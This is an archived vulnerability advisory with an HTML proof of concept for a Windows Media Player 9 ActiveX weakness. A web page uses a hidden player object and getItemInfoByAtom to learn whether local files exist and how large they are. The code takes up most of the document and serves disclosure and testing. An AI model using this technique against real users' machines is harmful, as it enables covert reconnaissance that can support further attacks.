33 lines
No EOL
1.2 KiB
HTML
33 lines
No EOL
1.2 KiB
HTML
source: https://www.securityfocus.com/bid/12032/info
|
|
|
|
The Windows Media Player ActiveX control is prone to a security weakness that may allow a malicious Web page to enumerate files that exist on the client computer.
|
|
|
|
This could aid in further attacks.
|
|
|
|
This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2.
|
|
|
|
<html><head><title>My Mortality</title></head><body>
|
|
|
|
<H1>Look at yourself and find the mortality of your body</H1>
|
|
<object style="display:none;"
|
|
classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
|
|
id="WindowsMediaPlayer">
|
|
<param name="autoStart" value="0">
|
|
<param name="mute" value="1">
|
|
</object>
|
|
|
|
<script>
|
|
var filePath = prompt("Enter the path of local file to check:","c:\\test.txt");
|
|
WindowsMediaPlayer.URL=filePath;
|
|
setTimeout(
|
|
function(){
|
|
ss=WindowsMediaPlayer.currentMedia.getItemInfoByAtom(19);
|
|
if (ss!="")
|
|
alert(filePath+" exist.\nThe file size is "+ss+" bytes. And you are surely vulnerable");
|
|
else
|
|
alert(filePath+" does not exist. Or you are not vulnerable");
|
|
}
|
|
,100);
|
|
</script>
|
|
|
|
</body></html> |